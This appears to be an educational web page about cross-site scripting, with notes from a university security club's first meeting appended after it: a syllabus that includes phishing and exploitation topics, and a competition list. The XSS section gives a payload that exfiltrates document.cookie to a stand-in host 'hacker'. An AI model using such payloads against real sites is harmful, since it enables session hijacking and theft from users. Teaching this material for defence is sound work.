Cross site scripting(XSS)

What is it?

Cross-Site Scripting (also known as XSS) is one of the most common application-layer web attacks. XSS vulnerabilities target scripts embedded in a page that are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat that is brought about by the internet security weaknesses of client-side scripting languages, such as HTML and JavaScript. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page that can be executed every time the page is loaded, or whenever an associated event is performed.

XSS is the most common security vulnerability in software today. This should not be the case as XSS is easy to find and easy to fix. XSS vulnerabilities can have consequences such as tampering and sensitive data theft.

Key Concepts of XSS

  • XSS is a web-based attack performed on vulnerable web applications.
  • In XSS attacks, the victim is the user and not the application.
  • In XSS attacks, malicious content is delivered to users using JavaScript.

Explaining Cross-Site Scripting

An XSS vulnerability arises when web applications take data from users and dynamically include it in web pages without first properly validating the data. XSS vulnerabilities allow an attacker to execute arbitrary commands and display arbitrary content in a victim user’s browser. A successful XSS attack leads to an attacker controlling the victim’s browser or account on the vulnerable web application. Although XSS is enabled by vulnerable pages in a web application, the victims of an XSS attack are the application’s users, not the application itself. The potency of an XSS vulnerability lies in the fact that the malicious code executes in the context of the victim’s session, allowing the attacker to bypass normal security restrictions.

XSS Attack Examples

Reflective XSS

There are many ways in which an attacker can entice a victim into initiating a reflective XSS request. For example, the attacker could send the victim a misleading email with a link containing malicious JavaScript. If the victim clicks on the link, the HTTP request is initiated from the victim’s browser and sent to the vulnerable web application. The malicious JavaScript is then reflected back to the victim’s browser, where it is executed in the context of the victim user’s session.

Stored XSS

Consider a web application that allows users to enter a username that is displayed on each user’s profile page. The application stores each username in a local database. A malicious user notices that the web application fails to sanitize the username field and inputs malicious JavaScript code as part of their username. When other users view the attacker’s profile page, the malicious code automatically executes in the context of their session.

Impact of Cross-Site Scripting

When attackers succeed in exploiting XSS vulnerabilities, they can gain access to account credentials. They can also spread web worms or access the user’s computer and view the user’s browser history or control the browser remotely. After gaining control to the victim’s system, attackers can also analyze and use other intranet applications.

By exploiting XSS vulnerabilities, an attacker can perform malicious actions, such as:

  • Hijack an account.
  • Spread web worms.
  • Access browser history and clipboard contents.
  • Control the browser remotely.
  • Scan and exploit intranet appliances and applications.

Identifying Cross-Site Scripting Vulnerabilities

XSS vulnerabilities may occur if:

  • Input coming into web applications is not validated
  • Output to the browser is not HTML encoded

XSS Examples

Example 1.

For example, the HTML snippet:

<title>Example document: %(title)</title>


is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:

<title>Example document: XSS Doc</title>


A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:

"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>


sitting on the other end, at the web server, you will be receiving hits where after a double space is the user’s cookie. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.

First Meeting – 8/21/2020

What is DevilSec?

DevilSec is a cyber security club based at Arizona State University (ASU) which has a sole purpose of better equipping students for their future careers into the many professions of cyber security. We provide hands on education and training for ethical hacking, network security, penetration testing, network administration, and systems security. 

What do you plan on teaching this semester?

Week 0: Introduction to DevilSec

Week 1: Linux OS & General Setup

Week 2: Enumeration / Recon

Week 3: Guest Speaker – TBD

Week 4: Privilege Escalation Techniques

Week 5: Identifying security vulnerabilities in web applications (LFI/RFI, File upload, SQL injection, XSS, etc)

Week 6: Guest Speaker – TBD 

Week 7: Running an successful Phishing campaign

Week 8: Live Fire – Red Vs Blue Team 

Week 9: Open Source Intelligence Gathering

Week 10: Finding vulnerabilities in iOS applications

Week 11: Active Directory Exploitation (Matt’s Favorite)

Week 12: Guest Speaker – TBD

Week 13: Live Fire – Red Vs Blue Team

Week 14: Semester Wrap up

What is Penetration Testing?

A penetration test, is an authorized simulated cyber attack on a computer system. 

It generally goes Recon -> Exploitation -> Privileged Escalation -> Persistence

What Competitions do you do?

  • Live-Fire Competition
    • DevilSec hosts a few live-fire competitions each year
  • CCDC
    • Collegiate Cyber Defense Competition 
  • CPTC
    • Collegiate Penetration Testing Competition
  • Hivestorm
    • Blue teaming on steroids. Meant for IT students.

What do I need to get started?

Check out this page on how to get started!